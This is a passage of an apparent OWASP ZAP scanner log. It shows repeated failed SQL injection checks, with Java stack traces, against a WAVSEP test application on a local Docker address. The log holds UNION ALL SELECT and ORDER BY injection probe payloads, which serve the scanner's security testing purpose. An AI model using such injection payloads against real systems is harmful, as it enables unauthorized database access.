org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679424 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679425 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679426 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679428 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679429 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679430 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 7849-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 7849-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679431 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679432 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679433 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 2100-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 2100-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679434 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679435 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679435 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 